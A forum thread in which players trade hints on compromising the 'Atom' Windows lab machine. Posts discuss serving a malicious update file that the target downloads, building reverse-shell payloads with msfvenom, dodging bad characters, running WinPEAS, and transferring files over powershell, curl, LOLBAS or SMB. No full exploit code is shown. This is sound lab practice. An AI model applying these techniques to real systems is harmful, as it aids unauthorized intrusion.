Official Atom Discussion

finally rooted! user was honestly a lot harder than root imo, since the steps to it are pretty vague.

User/foothold: Enumerate like how you usually would, at some point you should stumble across something that will vaguely point you in the write direction. Now do some google fu. If you’re like me, make sure not to be lazy at reading and researching, you’ll only waste your time if you copy something without understanding it.

root: Enumerate the target machine as usual. You might stumble across something that will give you deja vu. If not look at whats being used on the machine, and what ports are open. and google some stuff again. Once you connect the dots privsec is pretty straight forward and is the easier part of this box imo.

After a painfully long time I finally rooted it. A lot of it has to do with the fact that this is the first windows box I’ve attempted in months, but it’s still fairly difficult if you’re unaware of what you’re supposed to be looking for.

Tips for user: This one came to me fairly quickly, not sure if it was blind luck or what but it’s fairly easy to come by during your usual enumeration checklist. It may seem like a far reach to begin with, but doing a bit of googling will show you exactly what you need. In my case it was the first search result.

Tips for root: Honestly, without a sanity check from a helpful user I probably would’ve ignored this or left it until last. As previous people have mentioned, this service is sending outbound connections, that information tied with a short winpeas search will hopefully give you all you need. It may take you a hot minute to figure out what to do with what you find from that service, but enumerating some common places in the user folder will lead you to your answer.

Hello everyone,

I’m stuck on the foothold and would appreciate some help
 I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
I’m using mvm to generate the payload and use mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports, I don’t know what to do anymore :neutral:
(I’m using the flags -p, -f, -o (and -e when encoding)

Would any of you know what could be the cause?

Thank you and happy hacking!

Hi,

I just got user and I was having the same issues with you about the rev shell not happening. It ended to be something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what is that you are missing. Well, that was on my case the issue.

If still stuck let me know.

Pepe

Type your comment> @Netpal said:

Hello everyone,

I’m stuck on the foothold and would appreciate some help
 I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
I’m using mvm to generate the payload and use mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports, I don’t know what to do anymore :neutral:
(I’m using the flags -p, -f, -o (and -e when encoding)

Would any of you know what could be the cause?

Thank you and happy hacking!

When getting the foothole, you may have to play with the .**l file a bit. Don’t just follow the POC. Understand what the real vulnerability is. Then make your own exploit. Remember what a “null byte” is and that you have to remove bytes like them.

If you get stuck DM me.

@pp123 said:
Hi,

I just got user and I was having the same issues with you about the rev shell not happening. It ended to be something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what is that you are missing. Well, that was on my case the issue.

If still stuck let me know.

Pepe

Hi @pp123 , thank you for your answer! Well, I’ve been following the article from the start :confused: 
 My file contains a " ’ " in its name, as indicated in the article. I also tried to exclude bad characters from the payload as suggested by @kavigihan , but it doesn’t work either.

I’m starting to wonder if the issue could come from Metasploit, because I had warnings when using mv*m (due to a recent ruby gems update I think). I resolved those warnings by tinkering with commands, but there may still be a problem


At this point I’d be grateful if someone could just PM me their command to generate the payload.

Thank you!

Edit: I got it :smiley: It worked with another payload
 I was blindly following an advice to use a meterpreter one, but it worked with another one!

Hey everyone!

I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I finally found a command that works, but I ask by curiosity. Prior to finding that command, I tried various Powershell and “normal” Windows commands containing quotes in them and they all crashed my reverse shell (Session manipulation failed: Unmatched double quote). Do you guys know why?

Also, what .exe do you use? I just tried with x64 but it doesn’t work (that’s what I used in my msf***** payload).

Thanks!

@Netpal said:

Edit: I got it :smiley: It worked with another payload
 I was blindly following an advice to use a meterpreter one, but it worked with another one!

I got it working with a meterpreter payload.

I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I didn’t upload WinPEAS but I had a meterpreter shell and could just the upload option.

There are a lot of ways you can send data to boxes though:

  • powershell
  • curl
  • LOLBAS
  • SMB

(Session manipulation failed: Unmatched double quote). Do you guys know why?

Sounds a bit like a typo in the command, possibly failing to escape something.

Type your comment> @TazWake said:

Hi @TazWake, thank you for your answer :slight_smile:

@Netpal said:

Edit: I got it :smiley: It worked with another payload
 I was blindly following an advice to use a meterpreter one, but it worked with another one!

I got it working with a meterpreter payload.

That’s weird, I tried several different options and couldn’t get it to work
 I’ll try again and see if it works


I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I didn’t upload WinPEAS but I had a meterpreter shell and could just the upload option.

Ah right, I forgot we could do that with Meterpreter


There are a lot of ways you can send data to boxes though:

  • powershell
  • curl
  • LOLBAS
  • SMB

I didn’t know about LOLBAS, thank you for the info. In my case HTTP was the easiest way of doing it, but I’ll try the other options you mentionned.

(Session manipulation failed: Unmatched double quote). Do you guys know why?

Sounds a bit like a typo in the command, possibly failing to escape something.

You might be right, however I found those commands in articles explaining file transfers from Kali to Windows, so it’s weird it doesn’t work.

Have a nice day!

got user and root. Fun machine :slight_smile:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

user done!
But holyy how slowly works this machine wtf

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

stuck at same phase any help ???

Type your comment> @pagal said:

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

stuck at same phase any help ???

Read the POC, understand where the real vulnerability lies. Don’t just copy and paste
 Build your own one
DM if you are stuck

Rooted!
Very cool machine to make, I love Windows machines and the experience gained when trying to hack.

User: List and use google to find interesting things.
Careful when creating the pieces necessary for exploration, I hit my head and lost hours due to lack of attention.

Root: First time I make a machine where it’s easier than the user.

Feel free to send PM in case of help, if I don’t respond immediately you can call me on the telegram @WhoamiAlves


Enraizada!
Maquina muito legal de fazer, adoro maquinas Windows e a experiĂȘncia adquirida ao tentar hackear.

UsuĂĄrio: Enumerar e usar o google para encontrar coisas interessantes.
Cuidado ao criar as peças necessårias para exploração, eu bati a cabeça e perdi horas por falta de atenção.

Root: Primeira vez que faço uma maquina onde é mais fåcil que o usuårio.

Sinta-se a vontade para enviar PM em caso de ajuda, caso eu nĂŁo responda imediatamente pode me chamar no telegram @WhoamiAlves

#RecifePOXA!

Rooted, Heaps of good info in this thread. Pretty finicky machine for user and root needs you to put a couple of things together

DM if you need a push

Finally rooted! Man I did mistakes with this one :smiley:

Type your comment> @k01n said:

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

user done!
But holyy how slowly works this machine wtf

exactly how slowly? I’ve been waiting for about a half-hour. My M*********r session opens and closes, and the .**l file has been ingested.

Type your comment> @dobrocat said:

Type your comment> @k01n said:

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

user done!
But holyy how slowly works this machine wtf

exactly how slowly? I’ve been waiting for about a half-hour. My M*********r session opens and closes, and the .**l file has been ingested.

Yeah me too mate, every command that i write it took like 10 secs to execute. If i try to download something with powershell its impossible because never end the download
 i don’t know whats wrong with this machine

Type your comment> @k01n said:

Type your comment> @dobrocat said:

Type your comment> @k01n said:

Type your comment> @k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

user done!
But holyy how slowly works this machine wtf

exactly how slowly? I’ve been waiting for about a half-hour. My M*********r session opens and closes, and the .**l file has been ingested.

Yeah me too mate, every command that i write it took like 10 secs to execute. If i try to download something with powershell its impossible because never end the download
 i don’t know whats wrong with this machine

Cheers. It’s gotten worse ten hours later. I think this box is getting hammered by folks trying to get it before it retires tomorrow. Reckon I’ll move on and forget about this one for points and CPEs. Onward!

Thanks for replying.